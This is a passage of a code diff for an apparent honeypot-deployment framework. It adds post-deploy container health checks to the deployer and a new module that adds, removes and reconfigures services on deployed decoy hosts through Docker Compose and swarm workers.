parse failure — caller treats that as 'unverifiable, don't gate').
|
||||||
|
"""
|
||||||
|
cmd = [
|
||||||
|
"docker", "compose", "-p", "decnet", "-f", str(compose_file),
|
||||||
|
"ps", "--all", "--format", "json",
|
||||||
|
]
|
||||||
|
try:
|
||||||
|
result = subprocess.run( # nosec B603
|
||||||
|
cmd, capture_output=True, text=True, check=False,
|
||||||
|
)
|
||||||
|
except FileNotFoundError:
|
||||||
|
return []
|
||||||
|
if result.returncode != 0:
|
||||||
|
return []
|
||||||
|
rows: list[dict[str, object]] = []
|
||||||
|
# ``docker compose ps --format json`` emits one JSON object per line
|
||||||
|
# (newline-delimited), not a JSON array. Parse line-by-line so a
|
||||||
|
# single bad line doesn't poison the whole result.
|
||||||
|
for line in (result.stdout or "").splitlines():
|
||||||
|
line = line.strip()
|
||||||
|
if not line:
|
||||||
|
continue
|
||||||
|
try:
|
||||||
|
obj = json.loads(line)
|
||||||
|
except json.JSONDecodeError:
|
||||||
|
continue
|
||||||
|
if isinstance(obj, dict):
|
||||||
|
rows.append(obj)
|
||||||
|
elif isinstance(obj, list):
|
||||||
|
for item in obj:
|
||||||
|
if isinstance(item, dict):
|
||||||
|
rows.append(item)
|
||||||
|
return rows
|
||||||
|
|
||||||
|
|
||||||
def _compose(*args: str, compose_file: Path = COMPOSE_FILE, env: dict | None = None) -> None:
|
def _compose(*args: str, compose_file: Path = COMPOSE_FILE, env: dict | None = None) -> None:
|
||||||
import os
|
import os
|
||||||
# -p decnet pins the compose project name. Without it, docker compose
|
# -p decnet pins the compose project name. Without it, docker compose
|
||||||
@@ -393,6 +494,8 @@ def _compose_with_retry(
|
|||||||
console.print(f"[red]{result.stderr.strip()}[/]")
|
console.print(f"[red]{result.stderr.strip()}[/]")
|
||||||
log.error("docker compose %s failed after %d attempts: %s",
|
log.error("docker compose %s failed after %d attempts: %s",
|
||||||
" ".join(args), retries, result.stderr.strip())
|
" ".join(args), retries, result.stderr.strip())
|
||||||
|
if last_exc is None: # pragma: no cover — retries=0 is not a supported call
|
||||||
|
raise RuntimeError("_compose_with_retry exhausted retries without capturing an error")
|
||||||
raise last_exc
|
raise last_exc
|
||||||
|
|
||||||
|
|
||||||
@@ -562,6 +665,7 @@ def deploy(config: DecnetConfig, dry_run: bool = False, no_cache: bool = False,
|
|||||||
_sync_sessrec_sources(config)
|
_sync_sessrec_sources(config)
|
||||||
_sync_auth_helper_sources(config)
|
_sync_auth_helper_sources(config)
|
||||||
_sync_ntlmssp_sources(config)
|
_sync_ntlmssp_sources(config)
|
||||||
|
_sync_caddy_modules(config)
|
||||||
|
|
||||||
compose_path = write_compose(config, COMPOSE_FILE)
|
compose_path = write_compose(config, COMPOSE_FILE)
|
||||||
console.print(f"[bold cyan]Compose file written[/] → {compose_path}")
|
console.print(f"[bold cyan]Compose file written[/] → {compose_path}")
|
||||||
@@ -951,8 +1055,84 @@ async def deploy_topology(repo, topology_id: str, *, dry_run: bool = False) -> N
|
|||||||
)
|
)
|
||||||
raise
|
raise
|
||||||
|
|
||||||
await transition_status(repo, topology_id, TopologyStatus.ACTIVE)
|
# Post-deploy verification: ``compose up -d`` returns 0 the moment
|
||||||
log.info("topology %s deployed n_lans=%d", topology_id, len(lans))
|
# containers are *started*, so a service that crashes on boot
|
||||||
|
# (port bind failure, bad image, missing dependency) leaves the
|
||||||
|
# topology row sitting at ACTIVE while half the substrate is dead.
|
||||||
|
# Sample compose ps once and downgrade to DEGRADED if any expected
|
||||||
|
# container isn't running — operators see real state instead of an
|
||||||
|
# optimistic flag.
|
||||||
|
ps_rows = await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose_ps(compose_path),
|
||||||
|
)
|
||||||
|
bad: list[str] = []
|
||||||
|
# Build the per-decky state map. The base container's compose
|
||||||
|
# service name == decky name, which is what we cache on the
|
||||||
|
# TopologyDecky row. Service containers (named ``<decky>-<svc>``)
|
||||||
|
# don't gate the decky's state — service-level failures are visible
|
||||||
|
# in compose ps separately and don't downgrade the decky as a whole.
|
||||||
|
decky_state_by_name: dict[str, str] = {}
|
||||||
|
for row in ps_rows:
|
||||||
|
state = str(row.get("State", "")).lower()
|
||||||
|
service_name = str(row.get("Service") or "")
|
||||||
|
if service_name and "-" not in service_name:
|
||||||
|
# Plain decky base; cache its docker state.
|
||||||
|
decky_state_by_name[service_name] = state or "unknown"
|
||||||
|
if state and state != "running":
|
||||||
|
name = str(row.get("Name") or row.get("Service") or "?")
|
||||||
|
exit_code = row.get("ExitCode")
|
||||||
|
bad.append(
|
||||||
|
f"{name}={state}"
|
||||||
|
+ (f" (exit={exit_code})" if exit_code not in (None, 0, "") else "")
|
||||||
|
)
|
||||||
|
|
||||||
|
# Reconcile each TopologyDecky.state from compose's view. Without
|
||||||
|
# this, the row stays at the default 'pending' forever and the
|
||||||
|
# dashboard's ACTIVE DECKIES count reads 0/N even when everything's
|
||||||
|
# actually up.
|
||||||
|
for decky in hydrated["deckies"]:
|
||||||
|
cfg = decky.get("decky_config") or {}
|
||||||
|
decky_name = cfg.get("name") or decky.get("name")
|
||||||
|
if not decky_name:
|
||||||
|
continue
|
||||||
|
ds = decky_state_by_name.get(decky_name, "unknown")
|
||||||
|
new_state = "running" if ds == "running" else "failed"
|
||||||
|
try:
|
||||||
|
await repo.update_topology_decky(
|
||||||
|
decky["uuid"], {"state": new_state},
|
||||||
|
)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
log.warning(
|
||||||
|
"post-deploy state reconcile failed topology=%s decky=%s: %s",
|
||||||
|
topology_id, decky_name, exc,
|
||||||
|
)
|
||||||
|
|
||||||
|
if bad:
|
||||||
|
reason = "post-deploy check: " + ", ".join(bad[:8]) + (
|
||||||
|
f" and {len(bad) - 8} more" if len(bad) > 8 else ""
|
||||||
|
)
|
||||||
|
await transition_status(
|
||||||
|
repo, topology_id, TopologyStatus.DEGRADED, reason=reason,
|
||||||
|
)
|
||||||
|
log.warning(
|
||||||
|
"topology %s deployed but %d container(s) unhealthy: %s",
|
||||||
|
topology_id, len(bad), reason,
|
||||||
|
)
|
||||||
|
else:
|
||||||
|
await transition_status(repo, topology_id, TopologyStatus.ACTIVE)
|
||||||
|
log.info("topology %s deployed n_lans=%d", topology_id, len(lans))
|
||||||
|
|
||||||
|
# Best-effort canary baseline seed across every decky in the
|
||||||
|
# topology. Same resilience contract as the fleet path: failures
|
||||||
|
# surface as state=failed token rows, never abort the deploy.
|
||||||
|
try:
|
||||||
|
from decnet.canary import planter as _canary_planter
|
||||||
|
await _canary_planter.seed_baseline_topology(repo, topology_id)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
log.warning(
|
||||||
|
"canary baseline seed failed (best-effort) topology=%s err=%s",
|
||||||
|
topology_id, exc,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
@_traced("engine.teardown_topology")
|
@_traced("engine.teardown_topology")
|
||||||
|
|||||||
673
decnet/engine/services_live.py
Normal file
673
decnet/engine/services_live.py
Normal file
@@ -0,0 +1,673 @@
|
|||||||
|
"""Add/remove a single service on a deployed decky without full redeploy.
|
||||||
|
|
||||||
|
The ``_compose()`` wrapper in :mod:`decnet.engine.deployer` already
|
||||||
|
supports per-service targeting (``up --no-deps -d <svc>``,
|
||||||
|
``stop <svc>``, ``rm -f <svc>``). What was missing was the
|
||||||
|
orchestration: regenerate the compose file (so future redeploys reflect
|
||||||
|
the change), persist the new ``services`` list, and run the targeted
|
||||||
|
compose command.
|
||||||
|
|
||||||
|
Two scopes:
|
||||||
|
|
||||||
|
* **Topology** — source of truth is the ``topology_deckies`` table; the
|
||||||
|
compose file is per-topology (``decnet-topology-<id8>-compose.yml``).
|
||||||
|
* **Fleet** — source of truth is ``decnet-state.json`` (with the
|
||||||
|
``fleet_deckies`` table mirroring it); compose is the unihost
|
||||||
|
``decnet-compose.yml``.
|
||||||
|
|
||||||
|
Both publish ``decky.<name>.service.added`` /
|
||||||
|
``decky.<name>.service.removed`` on the bus. The new topic constants
|
||||||
|
are documented in ``wiki-checkout/Service-Bus.md``.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import subprocess # nosec B404
|
||||||
|
from pathlib import Path
|
||||||
|
from typing import Any, Literal, Optional
|
||||||
|
|
||||||
|
import anyio
|
||||||
|
|
||||||
|
from decnet.bus import topics
|
||||||
|
from decnet.logging import get_logger
|
||||||
|
from decnet.services.base import BaseService
|
||||||
|
from decnet.services.registry import get_service
|
||||||
|
from decnet.topology.persistence import hydrate
|
||||||
|
from decnet.web.db.repository import BaseRepository
|
||||||
|
|
||||||
|
# Heavy imports (composer/deployer pull in decnet.network → docker) are
|
||||||
|
# deferred to call-sites via the ``_compose`` / ``_topology_compose_path``
|
||||||
|
# / ``_load_state`` indirection helpers below. Mirrors the lazy-import
|
||||||
|
# pattern in decnet.canary.planter for the same reason.
|
||||||
|
|
||||||
|
|
||||||
|
def _compose(*args: str, compose_file: Optional[Path] = None, env=None) -> None:
|
||||||
|
"""Indirection so tests can ``monkeypatch.setattr(services_live, '_compose', ...)``.
|
||||||
|
|
||||||
|
Real implementation lives in :mod:`decnet.engine.deployer`; we
|
||||||
|
import-and-delegate at call time to keep this module's import graph
|
||||||
|
clean (see module docstring above).
|
||||||
|
"""
|
||||||
|
from decnet.engine.deployer import _compose as _real_compose
|
||||||
|
if compose_file is None:
|
||||||
|
_real_compose(*args, env=env)
|
||||||
|
else:
|
||||||
|
_real_compose(*args, compose_file=compose_file, env=env)
|
||||||
|
|
||||||
|
|
||||||
|
def _topology_compose_path(topology_id: str) -> Path:
|
||||||
|
from decnet.engine.deployer import _topology_compose_path as _real_path
|
||||||
|
return _real_path(topology_id)
|
||||||
|
|
||||||
|
|
||||||
|
def _write_topology_compose(hydrated, path: Path) -> Path:
|
||||||
|
from decnet.topology.compose import write_topology_compose
|
||||||
|
return write_topology_compose(hydrated, path)
|
||||||
|
|
||||||
|
|
||||||
|
def _load_state():
|
||||||
|
from decnet.config import load_state as _real_load_state
|
||||||
|
return _real_load_state()
|
||||||
|
|
||||||
|
|
||||||
|
def _save_state(config, compose_path) -> None:
|
||||||
|
from decnet.config import save_state as _real_save_state
|
||||||
|
_real_save_state(config, compose_path)
|
||||||
|
|
||||||
|
|
||||||
|
def _write_compose(config, compose_path) -> None:
|
||||||
|
from decnet.composer import write_compose as _real_write_compose
|
||||||
|
_real_write_compose(config, compose_path)
|
||||||
|
|
||||||
|
|
||||||
|
def _get_bus():
|
||||||
|
from decnet.bus.factory import get_bus
|
||||||
|
return get_bus()
|
||||||
|
|
||||||
|
|
||||||
|
# --------------------------- swarm propagation helpers ---------------------------
|
||||||
|
#
|
||||||
|
# Service mutations (add/remove/update_config) on a deployed decky used to run
|
||||||
|
# the master's local docker-compose only. For swarm fleet deckies the master
|
||||||
|
# has no containers; for agent-targeted topologies the master only writes a
|
||||||
|
# compose file the worker never sees. These helpers replay the change to the
|
||||||
|
# worker so the env actually lands.
|
||||||
|
#
|
||||||
|
# Lazy imports keep this module's import graph clean (composer/swarm pull in
|
||||||
|
# decnet.network → docker, mirroring the pattern used elsewhere in this file).
|
||||||
|
|
||||||
|
|
||||||
|
async def _fleet_decky_host_uuid(repo: BaseRepository, decky_name: str) -> Optional[str]:
|
||||||
|
"""Return ``host_uuid`` if a fleet decky lives on a swarm worker, else None."""
|
||||||
|
shards = await repo.list_decky_shards()
|
||||||
|
for s in shards:
|
||||||
|
if s.get("decky_name") == decky_name:
|
||||||
|
return s.get("host_uuid")
|
||||||
|
return None
|
||||||
|
|
||||||
|
|
||||||
|
async def _redispatch_fleet_shard(repo: BaseRepository, host_uuid: str) -> None:
|
||||||
|
"""Re-push the host's full shard to its worker agent.
|
||||||
|
|
||||||
|
Uses the same code path as POST /swarm/deploy: load master state, filter
|
||||||
|
to the host's deckies, hand to AgentClient.deploy via dispatch_decnet_config.
|
||||||
|
The agent regenerates compose and recreates only the changed containers.
|
||||||
|
Idempotent for unchanged deckies.
|
||||||
|
"""
|
||||||
|
from decnet.web.router.swarm.api_deploy_swarm import dispatch_decnet_config
|
||||||
|
|
||||||
|
state = _load_state()
|
||||||
|
if state is None:
|
||||||
|
log.warning("redispatch_fleet_shard: no fleet state on master; skipping")
|
||||||
|
return
|
||||||
|
config, _compose_path = state
|
||||||
|
host_deckies = [d for d in config.deckies if getattr(d, "host_uuid", None) == host_uuid]
|
||||||
|
if not host_deckies:
|
||||||
|
log.warning(
|
||||||
|
"redispatch_fleet_shard: master state has no deckies for host=%s; skipping",
|
||||||
|
host_uuid,
|
||||||
|
)
|
||||||
|
return
|
||||||
|
filtered = config.model_copy(update={"deckies": host_deckies})
|
||||||
|
await dispatch_decnet_config(filtered, repo)
|
||||||
|
|
||||||
|
|
||||||
|
async def _resync_agent_topology(repo: BaseRepository, topology_id: str) -> None:
|
||||||
|
"""If the topology is agent-pinned, push the latest hydrated blob to the worker."""
|
||||||
|
from decnet.engine.deployer import resync_agent_topology
|
||||||
|
|
||||||
|
hydrated = await hydrate(repo, topology_id)
|
||||||
|
if hydrated is None:
|
||||||
|
return
|
||||||
|
if not hydrated.get("topology", {}).get("target_host_uuid"):
|
||||||
|
return # unihost topology — local compose is authoritative
|
||||||
|
await resync_agent_topology(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
|
log = get_logger("engine.services_live")
|
||||||
|
|
||||||
|
DeckyKind = Literal["fleet", "topology"]
|
||||||
|
|
||||||
|
|
||||||
|
class ServiceMutationError(ValueError):
|
||||||
|
"""Raised for caller-correctable failures. The API layer dispatches on
|
||||||
|
subclass to produce 4xx codes; base class maps to 422.
|
||||||
|
"""
|
||||||
|
|
||||||
|
|
||||||
|
class ServiceNotFoundError(ServiceMutationError):
|
||||||
|
"""Decky or topology does not exist → 404."""
|
||||||
|
|
||||||
|
|
||||||
|
class ServiceConflictError(ServiceMutationError):
|
||||||
|
"""Idempotency violation (already on / not on) → 409."""
|
||||||
|
|
||||||
|
|
||||||
|
def _validate_service_for_per_decky(name: str) -> BaseService:
|
||||||
|
"""Return the registered service or raise ``ServiceMutationError``.
|
||||||
|
|
||||||
|
``fleet_singleton`` services run once per fleet (e.g. an LLMNR
|
||||||
|
responder), not per-decky — we reject the per-decky add/remove
|
||||||
|
request rather than silently producing a no-op compose entry.
|
||||||
|
"""
|
||||||
|
try:
|
||||||
|
svc = get_service(name)
|
||||||
|
except KeyError as exc:
|
||||||
|
raise ServiceMutationError(f"unknown service {name!r}") from exc
|
||||||
|
if svc.fleet_singleton:
|
||||||
|
raise ServiceMutationError(
|
||||||
|
f"service {name!r} is fleet_singleton; not addable per-decky"
|
||||||
|
)
|
||||||
|
return svc
|
||||||
|
|
||||||
|
|
||||||
|
async def _publish(topic: str, payload: dict[str, Any]) -> None:
|
||||||
|
"""Best-effort bus publish — same shape as the canary planter's helper."""
|
||||||
|
try:
|
||||||
|
bus = _get_bus()
|
||||||
|
await bus.connect()
|
||||||
|
await bus.publish(topic, payload)
|
||||||
|
await bus.close()
|
||||||
|
except Exception as e: # noqa: BLE001
|
||||||
|
log.warning("services_live bus publish failed topic=%s err=%s", topic, e)
|
||||||
|
|
||||||
|
|
||||||
|
# ---------------------------------------------------------- topology path
|
||||||
|
|
||||||
|
|
||||||
|
async def _topology_decky(
|
||||||
|
repo: BaseRepository, topology_id: str, decky_name: str,
|
||||||
|
) -> dict[str, Any]:
|
||||||
|
hydrated = await hydrate(repo, topology_id)
|
||||||
|
if hydrated is None:
|
||||||
|
raise ServiceNotFoundError(f"topology {topology_id!r} not found")
|
||||||
|
for d in hydrated["deckies"]:
|
||||||
|
cfg = d.get("decky_config") or {}
|
||||||
|
name = cfg.get("name") or d.get("name")
|
||||||
|
if name == decky_name:
|
||||||
|
return d
|
||||||
|
raise ServiceNotFoundError(
|
||||||
|
f"decky {decky_name!r} is not in topology {topology_id!r}"
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
async def _rerender_topology_compose(
|
||||||
|
repo: BaseRepository, topology_id: str,
|
||||||
|
) -> Path:
|
||||||
|
"""Re-hydrate + re-render the per-topology compose file.
|
||||||
|
|
||||||
|
Called after a successful DB update so future deploys reflect the
|
||||||
|
change; without this the file would still describe the old service
|
||||||
|
set and a subsequent ``up -d`` would resurrect the removed service.
|
||||||
|
"""
|
||||||
|
hydrated = await hydrate(repo, topology_id)
|
||||||
|
if hydrated is None: # pragma: no cover — narrow race
|
||||||
|
raise ServiceNotFoundError(
|
||||||
|
f"topology {topology_id!r} disappeared mid-mutation"
|
||||||
|
)
|
||||||
|
path = _topology_compose_path(topology_id)
|
||||||
|
_write_topology_compose(hydrated, path)
|
||||||
|
return path
|
||||||
|
|
||||||
|
|
||||||
|
async def _add_topology_service(
|
||||||
|
repo: BaseRepository,
|
||||||
|
topology_id: str,
|
||||||
|
decky_name: str,
|
||||||
|
service_name: str,
|
||||||
|
initial_config: dict | None = None,
|
||||||
|
) -> list[str]:
|
||||||
|
decky = await _topology_decky(repo, topology_id, decky_name)
|
||||||
|
services: list[str] = list(decky.get("services") or [])
|
||||||
|
if service_name in services:
|
||||||
|
raise ServiceConflictError(
|
||||||
|
f"service {service_name!r} already on decky {decky_name!r}"
|
||||||
|
)
|
||||||
|
services.append(service_name)
|
||||||
|
update: dict[str, Any] = {"services": services}
|
||||||
|
# If the caller supplied initial config, fold it into decky_config
|
||||||
|
# BEFORE compose regen so the first ``up`` materialises the env on
|
||||||
|
# the new container — no follow-up apply needed.
|
||||||
|
if initial_config:
|
||||||
|
cfg_blob = dict(decky.get("decky_config") or {})
|
||||||
|
sc = dict(cfg_blob.get("service_config") or {})
|
||||||
|
sc[service_name] = initial_config
|
||||||
|
cfg_blob["service_config"] = sc
|
||||||
|
update["decky_config"] = cfg_blob
|
||||||
|
await repo.update_topology_decky(decky["uuid"], update)
|
||||||
|
|
||||||
|
compose_path = await _rerender_topology_compose(repo, topology_id)
|
||||||
|
if await _topology_is_agent_pinned(repo, topology_id):
|
||||||
|
# Agent-pinned: the master's local compose has nothing to up.
|
||||||
|
# Push the new hydrated blob to the worker.
|
||||||
|
await _resync_agent_topology(repo, topology_id)
|
||||||
|
else:
|
||||||
|
target = f"{decky_name}-{service_name}"
|
||||||
|
# Run compose in a worker thread so the API event loop stays
|
||||||
|
# responsive — same pattern as engine/deployer.deploy_topology.
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose(
|
||||||
|
"up", "-d", "--no-deps", "--build", target,
|
||||||
|
compose_file=compose_path,
|
||||||
|
),
|
||||||
|
)
|
||||||
|
return services
|
||||||
|
|
||||||
|
|
||||||
|
async def _topology_is_agent_pinned(repo: BaseRepository, topology_id: str) -> bool:
|
||||||
|
hydrated = await hydrate(repo, topology_id)
|
||||||
|
if hydrated is None:
|
||||||
|
return False
|
||||||
|
return bool(hydrated.get("topology", {}).get("target_host_uuid"))
|
||||||
|
|
||||||
|
|
||||||
|
async def _remove_topology_service(
|
||||||
|
repo: BaseRepository,
|
||||||
|
topology_id: str,
|
||||||
|
decky_name: str,
|
||||||
|
service_name: str,
|
||||||
|
) -> list[str]:
|
||||||
|
decky = await _topology_decky(repo, topology_id, decky_name)
|
||||||
|
services: list[str] = list(decky.get("services") or [])
|
||||||
|
if service_name not in services:
|
||||||
|
raise ServiceConflictError(
|
||||||
|
f"service {service_name!r} not on decky {decky_name!r}"
|
||||||
|
)
|
||||||
|
services = [s for s in services if s != service_name]
|
||||||
|
target = f"{decky_name}-{service_name}"
|
||||||
|
compose_path = _topology_compose_path(topology_id)
|
||||||
|
agent_pinned = await _topology_is_agent_pinned(repo, topology_id)
|
||||||
|
if not agent_pinned:
|
||||||
|
# Stop + rm before persisting + re-rendering so a half-completed
|
||||||
|
# mutation leaves the operator a clear state to retry from
|
||||||
|
# (container still running; DB still says service is on).
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose("stop", target, compose_file=compose_path),
|
||||||
|
)
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose("rm", "-f", target, compose_file=compose_path),
|
||||||
|
)
|
||||||
|
await repo.update_topology_decky(decky["uuid"], {"services": services})
|
||||||
|
await _rerender_topology_compose(repo, topology_id)
|
||||||
|
if agent_pinned:
|
||||||
|
# Worker tears down the removed service when it diffs the
|
||||||
|
# incoming hydrated blob against its current state.
|
||||||
|
await _resync_agent_topology(repo, topology_id)
|
||||||
|
return services
|
||||||
|
|
||||||
|
|
||||||
|
# ---------------------------------------------------------- fleet path
|
||||||
|
|
||||||
|
|
||||||
|
def _fleet_state_or_raise() -> tuple[Any, Path]:
|
||||||
|
state = _load_state()
|
||||||
|
if state is None:
|
||||||
|
raise ServiceMutationError(
|
||||||
|
"no fleet state on disk — run `decnet up` first"
|
||||||
|
)
|
||||||
|
return state
|
||||||
|
|
||||||
|
|
||||||
|
def _fleet_find_decky(config: Any, decky_name: str) -> Any:
|
||||||
|
for d in config.deckies:
|
||||||
|
if d.name == decky_name:
|
||||||
|
return d
|
||||||
|
raise ServiceNotFoundError(f"fleet decky {decky_name!r} not found")
|
||||||
|
|
||||||
|
|
||||||
|
async def _persist_fleet_change(
|
||||||
|
repo: BaseRepository, decky: Any, services: list[str], compose_path: Path,
|
||||||
|
) -> None:
|
||||||
|
"""Persist the mutation to JSON state, compose file, and the DB row."""
|
||||||
|
config, _ = _load_state()
|
||||||
|
target = _fleet_find_decky(config, decky.name)
|
||||||
|
target.services = services
|
||||||
|
_save_state(config, compose_path)
|
||||||
|
_write_compose(config, compose_path)
|
||||||
|
# Mirror to the DB row so DB-only consumers (dashboard, API) see the
|
||||||
|
# change without waiting for the reconciler.
|
||||||
|
from decnet.web.db.models import LOCAL_HOST_SENTINEL
|
||||||
|
await repo.upsert_fleet_decky({
|
||||||
|
"host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL,
|
||||||
|
"name": decky.name,
|
||||||
|
"services": services,
|
||||||
|
"decky_config": target.model_dump(mode="json"),
|
||||||
|
"decky_ip": decky.ip,
|
||||||
|
"state": "running",
|
||||||
|
})
|
||||||
|
|
||||||
|
|
||||||
|
async def _add_fleet_service(
|
||||||
|
repo: BaseRepository,
|
||||||
|
decky_name: str,
|
||||||
|
service_name: str,
|
||||||
|
initial_config: dict | None = None,
|
||||||
|
) -> list[str]:
|
||||||
|
config, compose_path = _fleet_state_or_raise()
|
||||||
|
decky = _fleet_find_decky(config, decky_name)
|
||||||
|
services: list[str] = list(decky.services or [])
|
||||||
|
if service_name in services:
|
||||||
|
raise ServiceConflictError(
|
||||||
|
f"service {service_name!r} already on decky {decky_name!r}"
|
||||||
|
)
|
||||||
|
services.append(service_name)
|
||||||
|
if initial_config:
|
||||||
|
# Same path as _update_fleet_service_config: stash the validated
|
||||||
|
# cfg on the decky model so the compose write picks it up.
|
||||||
|
sc = dict(getattr(decky, "service_config", None) or {})
|
||||||
|
sc[service_name] = initial_config
|
||||||
|
decky.service_config = sc
|
||||||
|
await _persist_fleet_change(repo, decky, services, compose_path)
|
||||||
|
swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
|
||||||
|
if swarm_host_uuid:
|
||||||
|
# Master has no container for this decky — re-push the host's
|
||||||
|
# shard so the worker materialises the new service.
|
||||||
|
await _redispatch_fleet_shard(repo, swarm_host_uuid)
|
||||||
|
else:
|
||||||
|
target = f"{decky_name}-{service_name}"
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose(
|
||||||
|
"up", "-d", "--no-deps", "--build", target,
|
||||||
|
compose_file=compose_path,
|
||||||
|
),
|
||||||
|
)
|
||||||
|
return services
|
||||||
|
|
||||||
|
|
||||||
|
async def _remove_fleet_service(
|
||||||
|
repo: BaseRepository, decky_name: str, service_name: str,
|
||||||
|
) -> list[str]:
|
||||||
|
config, compose_path = _fleet_state_or_raise()
|
||||||
|
decky = _fleet_find_decky(config, decky_name)
|
||||||
|
services: list[str] = list(decky.services or [])
|
||||||
|
if service_name not in services:
|
||||||
|
raise ServiceConflictError(
|
||||||
|
f"service {service_name!r} not on decky {decky_name!r}"
|
||||||
|
)
|
||||||
|
services = [s for s in services if s != service_name]
|
||||||
|
target = f"{decky_name}-{service_name}"
|
||||||
|
swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
|
||||||
|
if not swarm_host_uuid:
|
||||||
|
# Local: stop+rm before persist so the operator has a clear retry
|
||||||
|
# state if compose fails halfway. Swarm: skip — the worker's compose
|
||||||
|
# will handle the removal when the redispatched config drops the
|
||||||
|
# service from the decky.
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose("stop", target, compose_file=compose_path),
|
||||||
|
)
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose("rm", "-f", target, compose_file=compose_path),
|
||||||
|
)
|
||||||
|
await _persist_fleet_change(repo, decky, services, compose_path)
|
||||||
|
if swarm_host_uuid:
|
||||||
|
await _redispatch_fleet_shard(repo, swarm_host_uuid)
|
||||||
|
return services
|
||||||
|
|
||||||
|
|
||||||
|
# ---------------------------------------------------------- public api
|
||||||
|
|
||||||
|
|
||||||
|
async def add_service(
|
||||||
|
repo: BaseRepository,
|
||||||
|
*,
|
||||||
|
decky_kind: DeckyKind,
|
||||||
|
decky_name: str,
|
||||||
|
service_name: str,
|
||||||
|
topology_id: Optional[str] = None,
|
||||||
|
config: dict | None = None,
|
||||||
|
) -> list[str]:
|
||||||
|
"""Add *service_name* to a deployed decky.
|
||||||
|
|
||||||
|
Validates the service registry (rejects unknown / fleet_singleton
|
||||||
|
names) and the optional ``config`` against the service's schema,
|
||||||
|
persists the change, regenerates the compose file, runs
|
||||||
|
``up -d --no-deps --build <decky>-<service>`` in a worker thread,
|
||||||
|
and publishes ``decky.<name>.service.added`` on the bus.
|
||||||
|
|
||||||
|
``config`` is the same dict shape PUT/POST .../config accepts; it's
|
||||||
|
coerced via ``BaseService.validate_cfg`` before any state write so
|
||||||
|
a 400-class failure leaves zero side-effects.
|
||||||
|
|
||||||
|
Returns the post-mutation services list.
|
||||||
|
"""
|
||||||
|
svc = _validate_service_for_per_decky(service_name)
|
||||||
|
initial_config = svc.validate_cfg(config) if config else {}
|
||||||
|
if decky_kind == "topology":
|
||||||
|
if not topology_id:
|
||||||
|
raise ServiceMutationError(
|
||||||
|
"decky_kind=topology requires topology_id",
|
||||||
|
)
|
||||||
|
services = await _add_topology_service(
|
||||||
|
repo, topology_id, decky_name, service_name,
|
||||||
|
initial_config=initial_config,
|
||||||
|
)
|
||||||
|
elif decky_kind == "fleet":
|
||||||
|
services = await _add_fleet_service(
|
||||||
|
repo, decky_name, service_name,
|
||||||
|
initial_config=initial_config,
|
||||||
|
)
|
||||||
|
else: # pragma: no cover — Literal narrows
|
||||||
|
raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")
|
||||||
|
|
||||||
|
await _publish(
|
||||||
|
topics.decky(decky_name, topics.DECKY_SERVICE_ADDED),
|
||||||
|
{
|
||||||
|
"decky_name": decky_name,
|
||||||
|
"service_name": service_name,
|
||||||
|
"topology_id": topology_id,
|
||||||
|
"services": services,
|
||||||
|
},
|
||||||
|
)
|
||||||
|
log.info(
|
||||||
|
"services_live.add decky=%s topology=%s service=%s",
|
||||||
|
decky_name, topology_id, service_name,
|
||||||
|
)
|
||||||
|
return services
|
||||||
|
|
||||||
|
|
||||||
|
async def update_service_config(
|
||||||
|
repo: BaseRepository,
|
||||||
|
*,
|
||||||
|
decky_kind: DeckyKind,
|
||||||
|
decky_name: str,
|
||||||
|
service_name: str,
|
||||||
|
cfg: dict,
|
||||||
|
apply: bool = False,
|
||||||
|
topology_id: Optional[str] = None,
|
||||||
|
) -> dict:
|
||||||
|
"""Persist ``cfg`` as the new ``service_config[service_name]`` for a decky.
|
||||||
|
|
||||||
|
The submitted dict is validated against the service's
|
||||||
|
``config_schema`` (unknown keys dropped, types coerced) BEFORE any
|
||||||
|
DB write, so a 400-class failure leaves zero side-effects.
|
||||||
|
|
||||||
|
``apply=False`` (Save): only the DB row + compose file are updated.
|
||||||
|
The running container keeps its old env.
|
||||||
|
``apply=True`` (Apply): same persistence, then a force-recreate of
|
||||||
|
``<decky>-<service>`` so the container picks
|
||||||
|
up the new env. Destructive: drops any
|
||||||
|
in-container session state on that service.
|
||||||
|
|
||||||
|
Returns the post-mutation validated cfg.
|
||||||
|
"""
|
||||||
|
svc = _validate_service_for_per_decky(service_name)
|
||||||
|
validated = svc.validate_cfg(cfg)
|
||||||
|
if decky_kind == "topology":
|
||||||
|
if not topology_id:
|
||||||
|
raise ServiceMutationError(
|
||||||
|
"decky_kind=topology requires topology_id",
|
||||||
|
)
|
||||||
|
await _update_topology_service_config(
|
||||||
|
repo, topology_id, decky_name, service_name, validated, apply=apply,
|
||||||
|
)
|
||||||
|
elif decky_kind == "fleet":
|
||||||
|
await _update_fleet_service_config(
|
||||||
|
repo, decky_name, service_name, validated, apply=apply,
|
||||||
|
)
|
||||||
|
else: # pragma: no cover
|
||||||
|
raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")
|
||||||
|
|
||||||
|
await _publish(
|
||||||
|
topics.decky(decky_name, topics.DECKY_SERVICE_CONFIG_CHANGED),
|
||||||
|
{
|
||||||
|
"decky_name": decky_name,
|
||||||
|
"service_name": service_name,
|
||||||
|
"topology_id": topology_id,
|
||||||
|
"service_config": validated,
|
||||||
|
"recreated": bool(apply),
|
||||||
|
},
|
||||||
|
)
|
||||||
|
log.info(
|
||||||
|
"services_live.update_config decky=%s topology=%s service=%s apply=%s",
|
||||||
|
decky_name, topology_id, service_name, apply,
|
||||||
|
)
|
||||||
|
return validated
|
||||||
|
|
||||||
|
|
